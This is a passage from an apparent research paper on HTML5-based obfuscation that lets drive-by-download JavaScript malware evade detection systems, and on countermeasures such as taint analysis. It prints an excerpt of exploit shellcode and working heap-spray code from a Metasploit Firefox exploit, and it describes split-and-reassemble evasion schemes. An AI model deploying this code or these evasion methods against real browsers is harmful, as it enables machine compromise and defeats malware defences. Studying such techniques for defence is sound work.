Abstract

The web has experienced explosive growth in recent years. New
technologies are introduced at a very fast pace with the aim of narrowing
the gap between web-based applications and traditional desktop
applications. The results are web applications that look and feel almost like
desktop applications while retaining the advantages of originating
from the web. However, these advancements come at a price. The same
technologies used to build responsive, pleasant and fully-featured web
applications can also be used to write web malware able to escape detection
systems. In this article we present new obfuscation techniques, based
on some of the features of the upcoming HTML5 standard, which can be
used to deceive malware detection systems. The proposed techniques have
been tested on a reference set of obfuscated malware. Our results
show that malware rewritten using our obfuscation techniques goes
undetected when analyzed by a large number of detection systems.
The same detection systems were able to correctly identify the same
malware in its original unobfuscated form. We also provide some hints about
how existing malware detection systems can be modified in order to
cope with these new techniques.


1 Introduction 

The web is becoming the medium of choice for the development and the
spreading of malware. Currently, it is estimated that approximately eighty-five
percent of all malware comes from the web (see [37]). One particular type of
malware that is gaining success is the one implementing the drive-by-download
attack (see [12]). In this attack, the unaware user downloads a web page from
the Internet containing malicious code, typically written in JavaScript. Once
downloaded, the code starts acquiring information from the context where it
is executed in order to determine which exploits can be used to gain access to
some of the resources of the local machine. If a known vulnerability is found,
the corresponding exploit code is downloaded, deobfuscated and executed.

The spread of drive-by-download malware may be limited by using detection
systems. These employ different techniques to determine whether a web page
contains malware. Detection systems can be used either to prevent the spread of
malware, by establishing in advance which web sites host malware and, thus,
must be blacklisted, or, during ordinary browsing activity, to warn users
about the potential danger of a page being browsed. State-of-the-art web
malware detection systems are based on the usage of honeyclients. These are client
machines used to visit web pages that could contain malware. If the client gets
compromised in some way after visiting a page, then the page is marked as
containing malware. This approach is very effective but also very expensive
in terms of time and computational power. For this reason, it is used in
conjunction with quick detection systems that are based on the static or semi-static
analysis of a web page. These are used as fast filters to choose which pages could
be harmful and, thus, should be analyzed by the honeyclients. The choice is
carried out by classifying the behavior of web pages according to several features
that are usually found in web malware.

The explosive growth of malware is continuously fueled by the release of new
technologies for the web. On one side, standardizing committees, web browser
developers and large companies operating on the Internet are pushing for the
adoption of technologies allowing the development of rich web-based client
applications. On the other side, the flourishing of these technologies is multiplying
the possibilities of developing malware that is more effective and harder to
detect than in the past.

In this work, we show how to use some of the functionalities introduced with
the upcoming HTML5 standard to rethink some of the obfuscation techniques
used to deliver web malware to the browser of a victim machine. We also
developed a reference implementation of the techniques we propose. These
implementations have been tested, together with a selection of publicly available
web malware, against several static and semi-static malware detection systems.
The tests have been conducted in two stages. In the first stage, the malware
samples have been analyzed by means of the chosen detection systems. In the
second stage, the same malware has been reformulated using our techniques
and then analyzed again. The results show that, in almost all
the analyzed cases, the considered web malware was correctly identified by the
detection systems in its original form, but went undetected after being
reformulated according to our techniques. The final aim of this article is to
raise awareness about the potential dangers of some of the new functionalities
related to the HTML5 standard, thus fueling the development of more robust
countermeasures. Some of these possible countermeasures are proposed along
with the explanation of the obfuscation techniques.

1.1 Organization of the Paper 

The remainder of the paper is organized as follows. In Section 2 we describe 
the anatomy of a typical drive-by download malware attack, with the help of 
a reference example. In Section 3 we briefly review the different approaches
proposed so far in the literature for the detection of malicious JavaScript code. In
Section 4 we discuss several features introduced by the HTML5 standard and
by several other related specifications which are of interest for our work. In
Section 5 we introduce and detail our obfuscation techniques. The description
of each technique is accompanied by a discussion of the possible strategies
for countering it. In Section 6 we present a prototype implementation
for our techniques together with the results of an experimental analysis aimed 
at assessing their effectiveness when used in conjunction with several malware 
codes and malware detection systems. Finally, we list some concluding remarks 
in Section 7. 


2 Anatomy of the Drive-by Download Attacks 

Drive-by download attacks work by fooling a victim user into downloading a web
page containing malicious code (usually written in JavaScript). This code
leverages some vulnerabilities existing in the web browser of the victim in
order to compromise the hosting machine. The exploitation is usually done by
targeting one or more bugs existing in some components of the browser, such
as installed add-ons or plug-ins. The final objective is the execution on the
client machine of a shellcode (typically, a hex-encoded binary code) that gives
the remote attacker access to the machine. As discussed in [8], these attacks
usually follow a standard sequence of steps:

1. Redirection and Cloaking. During this step, the victim may be sent
through a long series of redirections, with the goal of making it more
difficult to track the origin of the attack, until reaching the page where the
real attack is initiated. Another activity carried out in this step is the
acquisition of information about the execution environment (e.g., the IP
address of the client machine, the operating system and the browser being
used). This information is often transmitted to a remote server in order
to determine if the browser running on the target machine, or one of its
components, contains a vulnerability that can be leveraged to get access
to the machine. If such a component is found, then malware code
exploiting the corresponding vulnerability is sent back to the client. If no
vulnerability is found or if the malware detects that it is running
on a honeyclient, no shellcode is downloaded to the client.

2. Deobfuscation. The malware code usually comes as an obfuscated JavaScript
program. This is done in order to hide the real purpose of the code and
defeat signature-based analysis. The same may apply to the shellcode
carried by the malware. When the attack has to take place, the obfuscated
code is transformed into clear text.

3. Environment Preparation. Most JavaScript-based attacks
leverage vulnerabilities found in some of the DLLs or plug-ins
commonly installed in a browser. During this phase, the malware prepares
the code required to exploit these vulnerabilities and execute arbitrary
code.

4. Exploitation. This phase carries out the attack. This
typically involves the instantiation of the vulnerable software components
and the injection of the harmful code.

A typical example of a JavaScript-based attack is the one presented in
Listings 1, 2 and 3. The code has been generated by means of the
mozilla_attribchildremoved module of the Metasploit Framework ([28]), which is
publicly available on the web. The attack exploits a use-after-free
vulnerability ([4, 10]) that affects some recent versions of the Firefox browser
and allows arbitrary code to be executed on a victim machine running Windows XP.
Basically, the bug consists in the use of a pointer to an object that has already
been freed (dangling pointer), which results in a memory error and, typically, in
an application crash. The idea is that the memory previously occupied by the
removed object can be carefully manipulated so that the buggy invocation results
in a call to arbitrary code.

It is worth noting that the sample malware presented in this section cannot
be considered a fully-fledged drive-by download, since it does not implement all
the phases discussed above. For the sake of simplicity, only the exploitation
phase is considered hereinafter. However, without loss of generality, the
techniques presented in this paper can be straightforwardly extended to real-world
web-based malware, such as that implemented by the notorious exploit kits.

The variables have also been renamed and uppercased for the sake of clarity.

In the first phase, a malicious web server uses fingerprinting techniques in 
order to establish if the victim browser suffers from the vulnerability documented 
in [4] and in [10]. If so, a web page containing the malware is sent to the browser. 

In the second phase, the malicious code to be executed upon the attack is
typically deobfuscated by leveraging the highly dynamic nature of JavaScript, which
allows code assembled at runtime to be executed. In this case, the obfuscation
technique used by the mozilla_attribchildremoved module simply consists
of assigning random names to the variables used in the malicious code. In the
sample code presented in this section the random variable names have been
substituted with simplified uppercase names for the sake of clarity. No further
modifications to the original code have been made.

The third logical phase of the malware, related to the environment
preparation, consists of placing the payload in a predictable memory location, so that it
can be called upon exploitation. Listing 1 shows an excerpt of the payload
used for this experiment, which contains a series of binary instructions, encoded
as a UTF-8 string, that simply execute the Calculator application
under Windows XP. In this case, the malware employs the heap spray technique
([7, 29]) in order to accomplish this task. The most relevant instructions of this
technique are presented in Listing 2.

Finally, the malware can trigger the execution of the payload by exploiting
the vulnerability which causes the arbitrary code execution. The code
responsible for this task is shown in Listing 3. Basically, the removal of a child node
from the tree representing the structure of the web page being shown allows, in
some circumstances, for the child to still be accessible due to a premature
notification. By manipulating the memory reserved for this element, it is possible
to modify the program execution in order to launch the payload.

3 Detecting Malicious JavaScript Code 

Several techniques have been proposed so far for detecting web malware. In
the simplest approach, a database of malware patterns (signatures) is statically
matched against an input JavaScript code. If a match is found, then the code
is classified as malware. This approach is typically implemented by antivirus
software such as [38], [48], [2], as well as by intrusion detection systems such
as [32].

Listing 1: Deobfuscation

<script type="text/javascript">
...
var PAYLOAD = unescape("%uc481%ufa24%uffff%ucbdb%u74d9%uf424%ub85b%u73a4" +
    /* ... */
    "%u55bf%u3d8d%ud66e%ua735%u416e");
...
</script>

Static detection can be easily overcome in many ways. One of the most used
approaches relies on the dynamic features of the JavaScript language. Namely,
the malware is brought to the victim machine in an encrypted or obfuscated form
through a web page acting as an attack vector, as described in Section 2. The
web page analyzes the environment where it is run and sends the resulting
information back to a remote server. Then, it downloads the payload of the
attack (i.e., the malware). Finally, the malware code is converted to plain text
and executed using a dynamic code evaluation function, such as eval(). A static
analysis through a signature-based detection system will completely miss the code
run by the malware, as it is revealed only at runtime, thus making the correct
detection of the malware by means of a static analysis much harder.
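
As a rough illustration of this limitation, the following minimal sketch matches the raw text of a script against a small signature list. The signature names, the patterns and the two sample strings are hypothetical and harmless; they are assumptions made for the example and do not come from any of the cited products.

```javascript
// Hypothetical signature database: each entry pairs a name with a regular
// expression that is matched against the raw script text.
const SIGNATURES = [
  { name: "known-bad-marker", pattern: /KNOWN_BAD_MARKER/ },
  { name: "suspicious-unescape", pattern: /unescape\(\s*["']%u[0-9a-f]{4}/i },
];

// Return the names of all signatures that match the given source text.
function matchSignatures(source) {
  return SIGNATURES.filter((sig) => sig.pattern.test(source)).map((sig) => sig.name);
}

// The marker appears literally, so the static scan finds it.
const plain = 'var x = "KNOWN_BAD_MARKER";';

// The same marker is only assembled at runtime, so the raw text of the
// script never contains it and the static scan reports nothing.
const assembled = 'var x = ["KNOWN", "BAD", "MARKER"].join("_");';

console.log(matchSignatures(plain));     // one signature matches
console.log(matchSignatures(assembled)); // no signature matches
```

The second sample carries the same string at runtime, but a scanner that only inspects the source text has nothing to match against.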

A completely different and much more effective approach consists in runtime
analysis, which can be further divided into off-line and on-line analysis. Off-line
analysis is performed by means of a honeyclient, which is an instrumented
environment aimed at analyzing the effects produced by the execution of potentially
malicious code. In high-interaction honeyclients (e.g., [16, 35]) the rendering of
the web page is carried out in a sandbox, which is typically implemented as a
virtual machine running a fully-featured browser. The surrounding environment
is monitored in order to detect possible attempts to compromise the system,
which is typically accomplished by analyzing API calls, system calls, filesystem
modifications, network activity and so on.

Listing 2: Environment Preparation

<script type="text/javascript">
var OFFSET = 1542;
for (var i = 0; i < 0x320; i++) {
    var PADDING = unescape(PADDING_STR);
    while (PADDING.length < 0x1000) PADDING += PADDING;
    JUNK_OFFSET = PADDING.substring(0, OFFSET);
    var SINGLE_SPRAYBLOCK = JUNK_OFFSET + PAYLOAD;
    SINGLE_SPRAYBLOCK += PADDING.substring(0, 0x800 - OFFSET - PAYLOAD.length);
    while (SINGLE_SPRAYBLOCK.length < 262144) SINGLE_SPRAYBLOCK += SINGLE_SPRAYBLOCK;
    SPRAYBLOCK = SINGLE_SPRAYBLOCK.substring(0, (262144 - 6) / 2);
    VARNAME = "var" + RAND1.toString() + RAND2.toString();
    VARNAME += RAND3.toString() + RAND4.toString() + i.toString();
    VARSTR = "var " + VARNAME + "= '" + SPRAYBLOCK
    eval(VARSTR);
}
</script>

A limitation of high-interaction honeyclients is that malware can be
detected only if the attack succeeds, which may not happen. Malware may employ
fingerprinting and cloaking techniques in order to adapt its behavior at runtime
according to the environment where it runs. A web page could be harmful if
opened with a certain version of a certain type of browser using a certain type
of plugin, while being completely harmless if opened in any other configuration.
The malware could even be able to discern whether it runs inside a sandbox
([20]) and completely evade the analysis as a consequence. This implies the need
to check the same web page several times, using all the different
combinations of browsers, operating systems, installed plugins and so on. This has the
effect of dramatically increasing the computational time required to scan all
the possible configurations as well as the overhead of keeping the
system updated with all the possible testing configurations. This cost is further
magnified by the release of new versions of the software products used in the
browsing activity and by the discovery and disclosure of new vulnerabilities in
these products.
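
To give a feeling for how quickly this cost grows, the sketch below multiplies the sizes of a few configuration dimensions. The dimension names and the numbers are purely illustrative assumptions, not measurements.

```javascript
// Hypothetical inventory of test configurations; the numbers are
// illustrative only.
const inventory = {
  operatingSystems: 4,
  browsers: 5,
  browserVersions: 10,
  pluginSets: 8,
};

// Every combination has to be visited once, so the total is the product
// of the sizes of the individual dimensions.
function countConfigurations(dimensions) {
  return Object.values(dimensions).reduce((total, size) => total * size, 1);
}

const visitsPerPage = countConfigurations(inventory);
console.log(visitsPerPage); // 4 * 5 * 10 * 8 = 1600
```

Under these assumptions a single page would need 1600 visits, and every new browser release or plugin version multiplies the figure further.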

A similar approach is adopted by low-interaction honeyclients (e.g., [3, 31, 49,
29, 11]). Rather than analyzing the effects on the system, these analyze the code
flow produced by the web page. This is typically accomplished by means of an
emulated environment which makes it possible to inspect instructions and data.
Detection can be based on signature matching ([26]) or on more sophisticated anomaly
detection procedures ([49]). Thanks to browser and environment emulation,
low-interaction honeyclients have higher detection rates than
high-interaction honeyclients. Moreover, the preliminary phases of an attack (e.g.,
fingerprinting, deobfuscation, memory preparation, etc.) can also be exposed.
Off-line detection systems are typically fed by web crawlers and used to perform
large-scale analyses. Malicious URLs can be added to a blacklist of malicious
domains which may be used, for example, by browsers and search engines to
warn users about the page they are visiting.
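
A blacklist lookup of this kind can be sketched as follows. The domain names are hypothetical, and matching on the host or any of its parent domains is an assumption of this example rather than the policy of any specific browser or search engine.

```javascript
// Hypothetical blacklist of domains flagged by an off-line analysis.
const BLACKLISTED_DOMAINS = new Set(["malicious.example", "bad.example"]);

// Return true if the host of the URL, or any parent domain of it, is listed.
function isBlacklisted(urlString) {
  let host;
  try {
    host = new URL(urlString).hostname.toLowerCase();
  } catch (err) {
    return false; // not a valid absolute URL: nothing to look up
  }
  const labels = host.split(".");
  // Check "a.b.c", then "b.c"; the bare top-level label is never checked.
  for (let i = 0; i < labels.length - 1; i++) {
    if (BLACKLISTED_DOMAINS.has(labels.slice(i).join("."))) return true;
  }
  return false;
}

console.log(isBlacklisted("http://cdn.malicious.example/page.html"));
console.log(isBlacklisted("https://example.org/"));
```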

The analysis performed by means of a honeyclient may require a considerable
amount of time. For this reason, the usage of honeyclients is often combined with
other lighter detection techniques, like the ones presented in [23], [8], [6], [31].
The rationale of these techniques is to analyze, either statically or dynamically,
the content of a page and classify its behavior according to several features such
as: the instantiation of very long strings, the usage of encrypting and decoding
primitives, the allocation of software components that are known to be subject
to exploits. This analysis occurs at a preliminary stage. If a page is found
to be potentially harmful, it is sent to the honeyclient for further analysis.
Otherwise, the page is discarded. The advantage of this hybrid approach is
that this preprocessing can be performed much faster than the
honeyclient-based analysis, so that the latter is used only for pages that have a higher
chance of being harmful.
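
The two-stage arrangement described above can be sketched as a cheap filter placed in front of the expensive analysis. The feature lists, the length threshold and the rule of forwarding a page when at least two features fire are all assumptions chosen for illustration; the systems cited above use their own features and trained classifiers.

```javascript
// Hypothetical thresholds and feature lists, chosen for illustration only.
const LONG_STRING_LENGTH = 1000;
const DECODING_PRIMITIVES = ["unescape", "decodeURIComponent", "fromCharCode", "atob"];
const RISKY_COMPONENTS = ["ActiveXObject", "application/x-shockwave-flash"];

// Extract three cheap features from the raw text of a page.
function extractFeatures(pageSource) {
  const stringLiterals = pageSource.match(/"[^"]*"|'[^']*'/g) || [];
  return {
    longStrings: stringLiterals.filter((s) => s.length > LONG_STRING_LENGTH).length,
    decodingCalls: DECODING_PRIMITIVES.filter((name) => pageSource.includes(name + "(")).length,
    riskyComponents: RISKY_COMPONENTS.filter((name) => pageSource.includes(name)).length,
  };
}

// Forward a page to the honeyclient only if at least two features fire.
function triage(pageSource) {
  const f = extractFeatures(pageSource);
  const fired = [f.longStrings, f.decodingCalls, f.riskyComponents].filter((n) => n > 0).length;
  return fired >= 2 ? "honeyclient" : "discard";
}

const benignPage = '<p>Hello</p><script>var a = "hi";</script>';
const suspiciousPage =
  'var s = unescape("' + "A".repeat(2000) + '"); new ActiveXObject("X");';

console.log(triage(benignPage));
console.log(triage(suspiciousPage));
```

Only pages routed to "honeyclient" would pay the cost of a full dynamic analysis.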

On-line analysis is more concerned with web client security, and can be
employed in order to detect and prevent the execution of web malware at runtime.
It can be accomplished by means of in-browser ([18, 9]) or binary ([21])
instrumentation. Since efficiency is one of the main aims of these systems, on-line
analysis is typically based on a combination of dynamic and static approaches.
Basically, function parameters are retrieved dynamically, while detection is
performed by means of static classifiers (e.g., the presence of certain patterns likely to
be malicious). As in the case of high-interaction honeyclients, on-line analysis
could be evaded by means of cloaking techniques. In [22] a system for detecting
environment fingerprinting and cloaking attempts has been proposed, which can
be used in conjunction with both on-line and off-line analysis.

4 HTML5 and the Next Generation Web 

HTML5 is the emerging standard for the next-generation web. Although not
yet finalized, the standard is already available as a draft (see [47, 50]) and
is largely implemented in all major browsers. It is currently being developed
by both the World Wide Web Consortium (W3C) and the Web Hypertext
Application Technology Working Group (WHATWG). The W3C is focused on
the development of the standard specification while the WHATWG pays
more attention to the way the specification is implemented by the web browsers
and to the development of all the technologies that are related to this standard.

In addition, the W3C and the WHATWG are also active
in the development of several other specifications (see, e.g., [42, 44]) that
complement the work done on the main HTML5 specifications. One of the goals
of these specifications is to provide developers with the instruments required
to code web applications that look and feel like standard desktop
applications, while retaining the advantages of distributed computing. To this end,
the specifications introduce several new features that make it possible to obtain
richer and more responsive user interfaces, to efficiently cache and retrieve user
data on a local machine, to have web applications seamlessly transfer data to and
from their server counterparts with a small overhead, and to mash together
several services hosted by different providers and used by the same application.
These features can be leveraged through several JavaScript-based programming
APIs.

In the following, we briefly describe some of the most noteworthy HTML5 
APIs. 

Local Storage API Allows structured data, indexed by textual keys, to be
persistently stored in a storage area provided by the browser (see [44]). This
mechanism is an evolution of the one implemented by cookies. Access to
the storage is restricted on a per-domain basis (i.e., only applications originating
from the same domain that created a storage area can access it) and is only
possible from the client side of a web application.

Web SQL Storage API Allows relational data to be persistently stored and
queried using a database and the SQL language (see [41]). The access protection
scheme is the same used in the Local Storage case. At the moment, there is no
standard specification of the SQL dialect to be supported by this technology.
Instead, all web browser implementors refer to the SQL dialect supported by
SQLite. This DBMS is also the one used by all browsers (except Firefox) for
implementing this feature.

IndexedDB API Allows a collection of records, containing either simple values
or hierarchical objects, to be persistently maintained and queried (see [43]). Each
record consists of a key and some values. Information can be retrieved either
by using its key or by defining indexes on some of the fields of the stored data.
Unlike the Web SQL Storage API, this API cannot rely on the
expressiveness and the flexibility of the SQL language when querying for data.
On the other hand, the key-value approach guarantees faster querying times and
prevents SQL injection attacks.

File API Allows information to be persistently maintained and accessed using a
file-oriented interface (see [42]). Data can be of two types: File or Blob. The
former is typically used to map access to objects that are stored as files in
the file system underlying the browser. The latter is used to map access to
immutable raw binary data that is usually stored in memory and exchanged
with a remote server.

Web Workers API Implements a multi-threaded execution model within
web applications. The application has the possibility to fork one or more
threads. These are executed concurrently with their parent thread, using a
different core/processor (if available). These threads run as long as their
parent threads exist. Their execution occurs in a sandbox where most of the
APIs available to web applications cannot be used. Communication between
threads takes place through the exchange of messages, whose data is copied
rather than shared. These threads were originally conceived as a means for web
applications to carry out CPU-intensive tasks without affecting the response time
of the user interface.

Canvas API Allows arbitrary graphics to be drawn and manipulated on a canvas
surface (see [45]). The surface is encapsulated in a Canvas HTML element. The
application can modify the content of a canvas pixel by pixel or use high-level
graphical primitives to draw lines, shapes, text and images. The content of a canvas
can also be processed using image transformation operators or composition
operators. Finally, arbitrary graphical animations can be easily implemented by
programmatically updating the content of a canvas element through a periodic
refresh.

Cross-Origin Client Communication Allows two or more web
applications originating from different domains and running in different contexts (i.e.,
two iframes in the same page or two different pages) to communicate. The
communication is asynchronous and is based on the exchange of messages ([17]). The
application willing to receive messages creates a new listener that is uniquely
bound to the domain where it originated. The application interested in
communicating creates a new message and sends it by providing the domain address
where the target application should be listening. When receiving a new message,
the target application may check (programmatically) the source of the message
and decide whether to examine or discard it.
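
The programmatic check on the receiving side can be sketched as follows. The handler reads the origin and data properties that browsers attach to message events; the trusted origin and the function name handleMessage are hypothetical, and the handler is written as a plain function so that it can also be exercised outside a browser.

```javascript
// Hypothetical list of origins this application agrees to talk to.
const TRUSTED_ORIGINS = new Set(["https://widgets.example"]);

// Handler in the shape expected by window.addEventListener("message", ...).
// It returns the accepted payload, or null when the message is discarded.
function handleMessage(event) {
  if (!TRUSTED_ORIGINS.has(event.origin)) {
    return null; // unknown sender: discard without looking at the data
  }
  return event.data;
}

// In a browser the receiver would register the handler with:
//   window.addEventListener("message", handleMessage);
// and a sender would address the receiver's origin explicitly:
//   targetWindow.postMessage("hello", "https://receiver.example");

console.log(handleMessage({ origin: "https://widgets.example", data: "hello" }));
console.log(handleMessage({ origin: "https://unknown.example", data: "hello" }));
```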

WebSocket API Allows a web browser to maintain a TCP-based
communication channel with server-side processes (see [45]). Unlike traditional
communication mechanisms based on the exchange of HTTP requests and responses,
this channel allows for full-duplex transmissions. The content of a communication
can be either binary data or text, and a transmission can be initiated by either of
the two parties of the communication.


5 Fooling Malware Detection Systems

As discussed in Section 2, drive-by-download web malware is usually encrypted
and/or obfuscated in order to escape signature-based detection systems. As a
consequence, many static and semi-static detection systems look for
programming patterns that resemble decoding or deobfuscation
routines in a JavaScript file, together with some other clues, in order to establish
whether it is likely to be malware.

In this article we propose three obfuscation techniques, based on some of the 
JavaScript-based APIs available with HTML5, to be used for delivering and/or 
assembling a malware in a web browser running on a target victim machine 
while fooling detection systems. 

All the techniques are based on the original drive-by-download malware 
schema: (1) as a preliminary phase, the original malware is obfuscated and 
stored server-side; (2) once the victim visits the malicious page, the malware is 
downloaded, reassembled and launched. 

The obfuscation phase (1) is common to all the techniques and can be
summarized as follows. The malicious code is split into a series of chunks, each one
containing a piece of the original code. The chunks are constructed ad hoc in
order to be individually undetectable (i.e., they resemble common strings).

The delivery and the deobfuscation phases (2) leverage HTML5 functions
to avoid the typical (de)obfuscation patterns detectable upon a static or
semi-static code analysis. The three techniques are:

• Delegated Preparation. Delegate the preparation of malware to the
system APIs.

• Distributed Preparation. Distribute the preparation code over several
concurrent and independent processes running within the browser.

• User-driven Preparation. Let the user trigger the execution of the
preparation code during the time spent on a single page or a web site.


5.1 Delegated Preparation 

Web malware makes massive use of strings. JavaScript provides many string
manipulation functions that are particularly useful to embed shellcode in a web
page and to implement (de)obfuscation routines. For this reason, detection
systems focus on the study of strings and string-related functions. Detection rules are
typically based on features like: occurrences of string manipulation functions like
unescape(), decoding functions such as decode() and decodeURIComponent(),
very long loops which are typically used for code deobfuscation, and the number of
occurrences of the eval() or document.write() functions, which can be used to evaluate
a string.
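
Features of this kind are cheap to compute. The following minimal sketch counts the calls to a few of the functions named above in the raw text of a script; the function list, the helper names and the matching rule (a name followed by an opening parenthesis and not preceded by an identifier character) are assumptions of this example, not the rules of any specific detector.

```javascript
// Functions named in the text as typical detection features.
const TRACKED_FUNCTIONS = ["unescape", "decodeURIComponent", "eval", "document.write"];

// Escape regular-expression metacharacters in a literal string.
function escapeRegExp(text) {
  return text.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Count how many times each tracked function is called in the source.
function countCalls(source) {
  const counts = {};
  for (const name of TRACKED_FUNCTIONS) {
    // The lookbehind rejects longer identifiers such as "medieval(".
    const callPattern = new RegExp("(?<![\\w$])" + escapeRegExp(name) + "\\s*\\(", "g");
    counts[name] = (source.match(callPattern) || []).length;
  }
  return counts;
}

const sample = 'eval(unescape("%41")); medieval(1); document.write(x); eval (y);';
console.log(countCalls(sample));
```

A purely textual count like this is exactly what the techniques discussed in this section try to keep low.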

The delegated preparation technique allows web malware to avoid (completely
or partially) the activities related to the decoding and/or the deobfuscation of
a string by delegating these to the web browser internals, through the
WebSQL API or the IndexedDB API. As described in Section 4, these APIs allow
a database to be maintained and queried on the client side of a web application.
The idea we propose is to split the malicious code into a series of chunks and to
recompose it at runtime, as typically occurs for simple (de)obfuscation routines.
The difference here is that each chunk is stored in a table entry in the local
browser database. Then, when the attack has to take place, the retrieval and the
preparation of the malicious code are delegated to the database engine through a
properly crafted selection query. If a browser implementing the WebSQL API
through the SQLite software is used, the concatenation of the strings can be
completely delegated to the SQL engine, by means of the GROUP_CONCAT()
function. Otherwise, it would be up to the user-level code to browse the recordset
returned by the query and concatenate the resulting strings. The resulting code
can finally be executed by using the eval() function.

An alternative approach is based on the usage of the FileReader API. As
described in Section 4, this API is meant to be used for dealing with data stored in
the local storage of a browser by means of a file-oriented approach. An additional,
although less popular, capability of this API is the possibility of managing
in-memory generic objects consisting of raw binary data: the Blob objects. These
can hold an arbitrary number of byte arrays and are provided with a function that
converts their content into a single string of text. The aforementioned
technique could be adapted by having the malicious code converted into a string
of bytes and scattered into several very short arrays. These are sent to the client
machine, where they are stored as separate arrays in a single Blob object. Whenever
the attack has to be triggered, the content of the Blob is converted into text,
using the readAsText() function available with the FileReader API.

Comment The discussed techniques should prevent signature-based anti-malware
systems from detecting malicious code during a static analysis, because it is
assembled dynamically. Moreover, they do not require any further encryption
or obfuscation, as the malicious code is implicitly obfuscated by the
fragmentation schema used to break it into records. This avoids all the
operations that are usually needed to recover an encrypted/obfuscated code and
that detection systems use as a hint of the presence of a threat. Instead, the
malicious code is retrieved by using an application pattern that is apparently
harmless and very common in practice. For example, it resembles the code
written to prepare the text labels used when drawing a multi-language user
interface. Finally, when the GROUP_CONCAT() function is available, the
assembling of the original code string is triggered by a single line of
user-level code, as it is completely delegated to the SQL storage engine.

Countermeasures A simple, although rough, way to counter the delegated
preparation technique is to deny altogether the possibility of running code
that has been dynamically assembled using the output of a query to the local
storage engine. Similarly, running code assembled using the readAsText()
operation of the FileReader API should be denied. However, this solution may
be too limiting in a context where execution of dynamically assembled code is
required. In such cases, a different strategy should be employed.
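
As a rough illustration of how coarse such a blanket policy is, the following
sketch flags any script whose source mentions both a storage-aggregation
primitive and a dynamic evaluation function. The function name
flagsDelegatedAssembly and the two pattern lists are assumptions made for this
example only; they are not taken from any existing detection system, and mere
co-occurrence says nothing about whether the aggregated data actually reaches
the evaluation call.

```javascript
// Hypothetical pattern lists, chosen only for illustration.
const AGGREGATION_PATTERNS = [/GROUP_CONCAT\s*\(/i, /\.readAsText\s*\(/];
const EVALUATION_PATTERNS = [/\beval\s*\(/, /\bnew\s+Function\s*\(/];

// Returns true when the source text contains at least one aggregation
// primitive AND at least one dynamic evaluation call.
function flagsDelegatedAssembly(source) {
  const aggregates = AGGREGATION_PATTERNS.some((re) => re.test(source));
  const evaluates = EVALUATION_PATTERNS.some((re) => re.test(source));
  return aggregates && evaluates;
}

// A benign multi-language label loader is not flagged (no evaluation call).
console.log(flagsDelegatedAssembly(
  "tx.executeSql('SELECT GROUP_CONCAT(label) FROM Labels')"));
// A script combining readAsText() with eval() is flagged.
console.log(flagsDelegatedAssembly("fr.readAsText(blob); eval(text);"));
```

A check of this kind would also flag legitimate applications that combine the
two features for unrelated purposes, which is why a data-flow based strategy
is preferable where dynamic code is required.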

Among the different approaches proposed in the literature, one that seems
promising for countering the delegated preparation technique is the one based
on taint analysis (see [27, 19]). This is a particular type of data flow
analysis that works by marking as tainted the data, in a program execution,
that comes from a potentially malicious source. Then, the propagation of
tainted values is traced along the execution of the program. Finally, if
tainted values are used as input for the execution of a given set of
potentially harmful commands, a warning is produced.
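
The three steps above (marking, propagation, checking at a sink) can be
sketched as follows. This is a minimal illustration under our own assumptions,
not the mechanism of [27, 19]: the TaintedString class and the taint(),
concat() and guardedSink() helpers are hypothetical names, and only string
concatenation is tracked.

```javascript
// Wrapper that carries a value together with the sources it derives from.
class TaintedString {
  constructor(value, sources) {
    this.value = value;
    this.sources = new Set(sources);
  }
}

// Step 1: mark data coming from a potentially malicious source.
function taint(value, source) {
  return new TaintedString(value, [source]);
}

// Step 2: propagate taint through an operation (here, concatenation only).
function concat(a, b) {
  const sources = [];
  let text = '';
  for (const part of [a, b]) {
    if (part instanceof TaintedString) {
      text += part.value;
      sources.push(...part.sources);
    } else {
      text += String(part);
    }
  }
  return sources.length > 0 ? new TaintedString(text, sources) : text;
}

// Step 3: a guarded sink that records a warning instead of using tainted input.
function guardedSink(input, warnings) {
  if (input instanceof TaintedString) {
    warnings.push('tainted data from ' + [...input.sources].join(', ') +
                  ' reached a sink');
    return false;
  }
  return true;
}

const warnings = [];
const assembled = concat(taint('ab', 'network'), 'cd');
console.log(guardedSink(assembled, warnings), warnings.length);
```

A complete implementation would have to instrument every string operation of
the JavaScript engine; the wrapper class is used here only to keep the sketch
self-contained.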

In our case, taint analysis could be applied by isolating all cases where a
collection of strings is downloaded from the network, assembled into one
string and then used as input for a dynamic evaluation function. To follow
this strategy, taint analysis should be able to keep track of tainted values
even if these are stored in, and later retrieved from, the local storage
engine, as shown, e.g., in [39]. A possible way to reduce the number of false
positives would be to employ string analysis techniques to mark as tainted
only strings that are likely to contain assembly code.
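
Keeping taint information across a storage round trip can be sketched with a
shadow table that records, for each stored key, where its value came from.
The TaintAwareStore class below is a hypothetical illustration (it is not the
approach of [39]); a Map stands in for the browser storage engine and
concatAll() plays the role of an aggregation such as GROUP_CONCAT().

```javascript
class TaintAwareStore {
  constructor() {
    this.data = new Map();   // key -> stored string
    this.labels = new Map(); // key -> source label, present only if tainted
  }

  // Store a value; a non-empty sourceLabel marks it as tainted.
  put(key, value, sourceLabel) {
    this.data.set(key, value);
    if (sourceLabel) this.labels.set(key, sourceLabel);
    else this.labels.delete(key);
  }

  // Concatenate all values in ascending numeric key order; the result
  // carries the labels of every tainted value that contributed to it.
  concatAll() {
    const keys = [...this.data.keys()].sort((a, b) => a - b);
    const labels = new Set();
    let text = '';
    for (const key of keys) {
      text += this.data.get(key);
      if (this.labels.has(key)) labels.add(this.labels.get(key));
    }
    return { value: text, taintedBy: [...labels] };
  }
}

const store = new TaintAwareStore();
store.put(2, 'lo', 'websocket'); // chunk received from the network
store.put(1, 'hel', null);       // locally generated value
console.log(store.concatAll());
```

The design choice here is that the aggregate is tainted as soon as one
contributing record is tainted, which errs on the side of false positives.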

5.2 Distributed Preparation 

Typically, the operations driving the deobfuscation and the execution of a
malware would look harmless in themselves but harmful if considered as a
whole. The distributed preparation technique aims at deceiving detection
systems by breaking up the execution of a malware code into several simpler
pieces to be executed separately in different contexts. Each piece of code
would execute its part of the attack and then make the result available to
the next part.

From the technical point of view, this idea can be implemented by separating
the three activities of gathering the malicious code (in an encoded and/or
obfuscated form), deobfuscating it and running it, and by executing them in
different threads through web workers (see Section 4). Communication between
different workers could be established by using cross-origin client
communication primitives (see Section 4). Moreover, in order to further
confuse detection systems, the communication patterns to follow during the
execution of the attack would not be established statically but decided at
runtime, by evaluating a function that would decide which other web worker
would be the target of a communication at the end of a certain step.

Comment The expectation is that this approach should be able to fool both
static and semi-dynamic detection systems, because these should not be able to
